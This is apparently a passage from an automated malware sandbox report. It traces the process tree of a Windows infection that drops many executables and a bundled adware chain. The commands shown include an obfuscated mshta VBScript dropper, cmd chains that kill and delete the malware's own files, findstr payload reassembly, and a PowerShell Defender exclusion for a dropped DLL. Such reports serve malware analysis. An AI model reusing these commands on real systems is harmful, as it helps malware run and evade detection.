                                                                                                                                                  "C:\Users\Admin\Documents\_H5MoL5VSBNEH9NRXvWm65wi.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7856
                                                                                                                                                  • C:\Users\Admin\Documents\zbwzoQimdRROGEo9mHvPf4j1.exe
                                                                                                                                                    "C:\Users\Admin\Documents\zbwzoQimdRROGEo9mHvPf4j1.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:7848
                                                                                                                                                  • C:\Users\Admin\Documents\d_FGJR2mNZ7Gzs_rWqOrV9eY.exe
                                                                                                                                                    "C:\Users\Admin\Documents\d_FGJR2mNZ7Gzs_rWqOrV9eY.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:7840
                                                                                                                                                    • C:\Users\Admin\Documents\d_FGJR2mNZ7Gzs_rWqOrV9eY.exe
                                                                                                                                                      C:\Users\Admin\Documents\d_FGJR2mNZ7Gzs_rWqOrV9eY.exe
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7532
                                                                                                                                                    • C:\Users\Admin\Documents\AVsCia6vuCCkGyt2pmnbB5Wp.exe
                                                                                                                                                      "C:\Users\Admin\Documents\AVsCia6vuCCkGyt2pmnbB5Wp.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      PID:7832
                                                                                                                                                    • C:\Users\Admin\Documents\Lr8Ni0DGMaNFYRoTpBOKn5BE.exe
                                                                                                                                                      "C:\Users\Admin\Documents\Lr8Ni0DGMaNFYRoTpBOKn5BE.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:7824
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1722640.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1722640.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:8560
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6494648.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6494648.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                            PID:8600
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1783798.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1783798.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:8636
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1059741.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1059741.exe"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:8700
                                                                                                                                                            • C:\Users\Admin\Documents\V4u5j96Bd6n84PYzIUN4DUY2.exe
                                                                                                                                                              "C:\Users\Admin\Documents\V4u5j96Bd6n84PYzIUN4DUY2.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:7808
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im V4u5j96Bd6n84PYzIUN4DUY2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\V4u5j96Bd6n84PYzIUN4DUY2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:8880
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im V4u5j96Bd6n84PYzIUN4DUY2.exe /f
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:9048
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 6
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:7440
                                                                                                                                                              • C:\Users\Admin\Documents\SZc7fXwttJeRSQADolGmkBM5.exe
                                                                                                                                                                "C:\Users\Admin\Documents\SZc7fXwttJeRSQADolGmkBM5.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:7812
                                                                                                                                                              • C:\Users\Admin\Documents\SjM4hdQvifikxNBUavWDMev0.exe
                                                                                                                                                                "C:\Users\Admin\Documents\SjM4hdQvifikxNBUavWDMev0.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:7800
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im SjM4hdQvifikxNBUavWDMev0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\SjM4hdQvifikxNBUavWDMev0.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:8932
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /im SjM4hdQvifikxNBUavWDMev0.exe /f
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:5520
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /t 6
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:6944
                                                                                                                                                                • C:\Users\Admin\Documents\K5VKeIvX3UicT2rPEMclHW7I.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\K5VKeIvX3UicT2rPEMclHW7I.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:7792
                                                                                                                                                                    • C:\Users\Admin\Documents\K5VKeIvX3UicT2rPEMclHW7I.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\K5VKeIvX3UicT2rPEMclHW7I.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                      PID:3584
                                                                                                                                                                  • C:\Users\Admin\Documents\go9cH48Bb4zuYtKyPiBOlZX1.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\go9cH48Bb4zuYtKyPiBOlZX1.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:7784
                                                                                                                                                                  • C:\Users\Admin\Documents\8jVZjx94rX4DQna6ClRphpcG.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\8jVZjx94rX4DQna6ClRphpcG.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:7776
                                                                                                                                                                    • C:\Users\Admin\Documents\KsworbZeTIo24cyeT1ofJWo_.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\KsworbZeTIo24cyeT1ofJWo_.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:7768
                                                                                                                                                                    • C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:7760
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:7604
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\fWSyIjb_JS9AbeaRKXGkxbjo.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:2448
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                                                  hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:6988
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:9160
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:8504
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8076
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -f -iM "fWSyIjb_JS9AbeaRKXGkxbjo.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5512
                                                                                                                                                                              • C:\Users\Admin\Documents\xVcNLvnrLIkRvwMXAD_eWBuT.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\xVcNLvnrLIkRvwMXAD_eWBuT.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:7752
                                                                                                                                                                                • C:\Users\Admin\Documents\xVcNLvnrLIkRvwMXAD_eWBuT.exe
                                                                                                                                                                                  C:\Users\Admin\Documents\xVcNLvnrLIkRvwMXAD_eWBuT.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:5268
                                                                                                                                                                                • C:\Users\Admin\Documents\jG72pLCo9Q4e_hdnWIv1fBC5.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\jG72pLCo9Q4e_hdnWIv1fBC5.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:7500
                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\JG72PL~1.DLL,s C:\Users\Admin\DOCUME~1\JG72PL~1.EXE
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:7920
                                                                                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\JG72PL~1.DLL,JQIjUUw=
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                          PID:6524
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\JG72PL~1.DLL
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:7952
                                                                                                                                                                                      • C:\Users\Admin\Documents\ZXJt7COrpeDGOeQ0b8euboOM.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\ZXJt7COrpeDGOeQ0b8euboOM.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:7644
                                                                                                                                                                                          • C:\Users\Admin\Documents\ZXJt7COrpeDGOeQ0b8euboOM.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\ZXJt7COrpeDGOeQ0b8euboOM.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:8384
                                                                                                                                                                                          • C:\Users\Admin\Documents\MoKLaz0woWj79HL5Op0XYhse.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\MoKLaz0woWj79HL5Op0XYhse.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:8348
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-16GBF.tmp\MoKLaz0woWj79HL5Op0XYhse.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-16GBF.tmp\MoKLaz0woWj79HL5Op0XYhse.tmp" /SL5="$40450,138429,56832,C:\Users\Admin\Documents\MoKLaz0woWj79HL5Op0XYhse.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                PID:7792
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-AFQDT.tmp\Setup.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-AFQDT.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480191 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:7756
                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:7076
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmp68E3_tmp.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\tmp68E3_tmp.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:4264
                                                                                                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                        "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        PID:1156
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:4132
                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                              findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                Esplorarne.exe.com i
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                PID:8352
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                  PID:6876
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                    PID:8488
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                      PID:9124
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                        PID:6632
                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                PID:8400
                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:7012
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1970074.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1970074.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:4256
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5372587.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5372587.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:3232
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2223216.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2223216.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6432
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6628718.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6628718.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:1352
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1917868.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1917868.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 660
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:768
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:2876
                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                          PID:4060
                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          PID:7940
                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 1BE3CD3E5418022E98FA85A1E0502BD5 C
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:8428
                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 6EBC9307789B54F4F1C53C3C44C2F217 C
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:2956
                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding D3534837682EDD230119A350257EA388
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:8532
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding D573336A279A7D35D99CD2B5E5ACADEF C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:7248
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              PID:8408
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                PID:8220
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  PID:2472
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b8,0x1ec,0x7ffb9a0d9ec0,0x7ffb9a0d9ed0,0x7ffb9a0d9ee0
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:2996
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,4562538812695171801,10411207952543959902,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2472_910128910" --mojo-platform-channel-handle=1740 /prefetch:8
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:8240
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,4562538812695171801,10411207952543959902,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2472_910128910" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:808
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,4562538812695171801,10411207952543959902,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2472_910128910" --mojo-platform-channel-handle=1960 /prefetch:8
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:2636
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
